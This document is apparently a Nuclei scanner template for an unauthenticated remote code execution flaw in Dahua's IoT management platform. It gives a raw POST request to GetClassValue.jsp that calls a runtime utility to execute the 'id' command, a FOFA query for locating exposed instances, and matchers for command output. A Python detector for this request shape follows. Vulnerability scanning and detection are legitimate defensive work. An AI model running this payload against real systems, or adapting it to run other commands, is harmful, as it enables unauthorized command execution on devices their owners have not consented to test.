Vulnerability Description
Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
id: dahua-icc-getclassvalue-rce

info:
  name: Dahua 'GetClassValue' - Remote Code Execution
  author: ProjectDiscoveryAI
  severity: critical
  description: |
    Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
  reference:
    - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-icc-getclassvalue-rce.yaml
  metadata:
    fofa-query: app="dahua-智能物联综合管理平台"
    max-request: 1
  tags: rce,java,dahua,iot,unauth,vuln

http:
  - raw:
      - |
        POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "data": {
            "clazzName": "com.dahua.admin.util.RuntimeUtil",
            "methodName": "syncexecReturnInputStream",
            "fieldName": ["id"]
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a04a5b9873314a5d667a1576ca0fbea59fd3ec0733738d0fedf528f50921ee26022051adc86d702abe35751b182adbfbedc9d49149375bf823ad10c90c64f894e466:922c64590222798bb761d5b6d8e72950
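
A server-side check for the request shape this template sends, added here as an example; it is not part of the template or of any vendor or project code. It assumes raw HTTP/1.1 requests captured at a reverse proxy in front of the platform; the function names, sample requests, and the alert policy are assumptions.

```python
import json
from urllib.parse import unquote

# Endpoint from the template on this page, lower-cased for comparison.
ENDPOINT = "/evo-apigw/admin/api/developer/getclassvalue.jsp"

def normalize_path(target: str) -> str:
    """Drop the query, percent-decode, strip ;path-parameters, collapse // and case."""
    path = unquote(target.split("?", 1)[0])
    segs = [s.split(";", 1)[0] for s in path.split("/")]
    return "/" + "/".join(s for s in segs if s and s != ".").lower()

def classify(raw_request: str) -> str:
    """Return 'ignore', 'review' or 'alert' for one raw HTTP/1.1 request."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or normalize_path(parts[1]) != ENDPOINT:
        return "ignore"
    if parts[0].upper() != "POST":
        return "review"  # endpoint touched, but not with the template's method
    try:
        data = json.loads(body).get("data")
    except (ValueError, AttributeError):
        return "review"  # body is not a JSON object
    # Assumed policy: any request naming a class and a method here is an alert,
    # since the endpoint invokes whatever class/method the caller supplies.
    if isinstance(data, dict) and data.get("clazzName") and data.get("methodName"):
        return "alert"
    return "review"

# Constructed sample requests (host name is a placeholder).
_BODY = json.dumps({"data": {"clazzName": "com.dahua.admin.util.RuntimeUtil",
                             "methodName": "syncexecReturnInputStream",
                             "fieldName": ["id"]}})
_PATH = "/evo-apigw/admin/API/Developer/GetClassValue"
_HDRS = " HTTP/1.1\r\nHost: icc.example\r\nContent-Type: application/json\r\n\r\n"
SAMPLES = {
    "template_shape": "POST " + _PATH + ".jsp" + _HDRS + _BODY,
    "encoded_path": "POST " + _PATH + "%2Ejsp;x=1?a=b" + _HDRS + _BODY,
    "get_probe": "GET " + _PATH + ".jsp" + _HDRS,
    "broken_body": "POST " + _PATH + ".jsp" + _HDRS + "{not json",
    "unrelated": "GET /evo-apigw/index.html" + _HDRS,
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(f"{name:15s} {classify(req)}")
```
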